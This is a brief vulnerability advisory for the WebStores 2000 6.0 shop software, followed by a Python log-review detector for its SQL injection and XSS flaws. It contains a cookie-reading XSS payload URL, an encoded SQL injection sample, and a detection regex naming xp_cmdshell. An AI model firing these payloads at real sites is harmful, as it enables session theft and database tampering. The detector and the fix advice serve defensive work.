Program: Webstores 2000 6.0
Several input validation vulnerabilities have been discovered in WebStores 2000. A remote user can inject SQL commands and execute arbitrary operating system commands on the target system. A remote user can also conduct an XSS attack.
1. SQL injection in 'browse_item_details.asp'. In the two published example requests the injected SQL is carried in the SEARCH_SKU search parameter.
XSS:
http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>
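
A log-review check for the two issues above, as an added example that is not part of the original advisory or the vendor's code. It assumes the parameters appear in the logged request URL; the function name `inspect`, the finding labels and the sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A quote or statement separator followed by SQL syntax has no place in a
# search field; xp_cmdshell is flagged wherever it appears.
SQLI = re.compile(
    r"(;|')\s*(--|and\b|or\b|union\b|insert\b|exec\b|group\s+by\b)|xp_cmdshell",
    re.I,
)

def inspect(url):
    """Return (parameter, reason) findings for one logged request URL."""
    parts = urlsplit(url)
    page = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes values, so encoded payloads are checked decoded.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if page == "browse_item_details.asp" and SQLI.search(value):
            findings.append((name, "sql-metacharacters"))
        if (page == "error.asp" and name.lower() == "message_id"
                and not re.fullmatch(r"\d{1,9}", value, re.ASCII)):
            findings.append((name, "non-numeric-message-id"))
    return findings

SAMPLES = [  # constructed request URLs, not taken from real logs
    "/browse_item_details.asp?Search_Text=men's+shoes&Search_Dept=1&SEARCH_SKU=AB-1000",
    "/browse_item_details.asp?Search_Dept=1&SEARCH_SKU=%25%27+AND+1%3D1%3Binsert+into+T+values+%281%29--",
    "/error.asp?Message_id=35",
    "/error.asp?Message_id=35<script>alert(document.cookie)</script>",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect(url) or "clean", url)
```

The same two rules describe the server-side fix: Message_id should be accepted only as an integer, and search fields should reach the database as bound parameters rather than concatenated SQL.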